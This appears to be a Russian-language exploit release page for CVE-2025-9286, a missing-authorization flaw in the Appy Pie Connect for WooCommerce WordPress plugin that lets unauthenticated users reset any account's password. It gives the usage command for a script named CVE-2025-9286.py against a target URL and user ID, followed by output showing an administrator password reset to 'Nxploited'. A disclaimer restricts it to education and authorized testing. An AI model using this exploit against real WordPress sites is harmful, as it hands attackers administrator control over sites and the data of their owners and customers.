
Appy Pie Connect for WooCommerce <= 1.1.2 — Отсутствие авторизации, приводящее к неаутентифицированному повышению привилегий
Appy Pie Connect for WooCommerce <= 1.1.2 - Отсутствие авторизации, ведущее к неаутентифицированному повышению привилегий
Плагин Appy Pie Connect for WooCommerce для WordPress уязвим к повышению привилегий из-за отсутствия авторизации в REST-обработчике reset_user_password() во всех версиях вплоть до 1.1.2 включительно.
Это позволяет неаутентифицированным злоумышленникам сбрасывать пароль произвольных пользователей, включая администраторов, получая тем самым административный доступ.
Следующий эксплойт можно использовать для эксплуатации CVE-2025-9286 на сайтах WordPress, где установлена уязвимая версия плагина.
Имя скрипта: CVE-2025-9286.py
python CVE-2025-9286.py -u http://nxploit.ddev.site/ -id 1
[+] Checking plugin version: http://nxploit.ddev.site/wp-content/plugins/appy-pie-connect-for-woocommerce/readme.txt
[!] Vulnerable plugin detected (1.1.2). Attempting exploitation...
[*] Please wait, attempting to change password...
[+] Exploit successful! Password has been reset.
[*] New password: Nxploited
[+] Vulnerability exploited and password changed successfully.
Данный эксплойт предназначен только для образовательных целей и авторизованного тестирования на проникновение.
Несанкционированное использование в отношении систем без явного разрешения незаконно.
Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый данным инструментом.
Автор: Khaled Alenazi (Nxploited)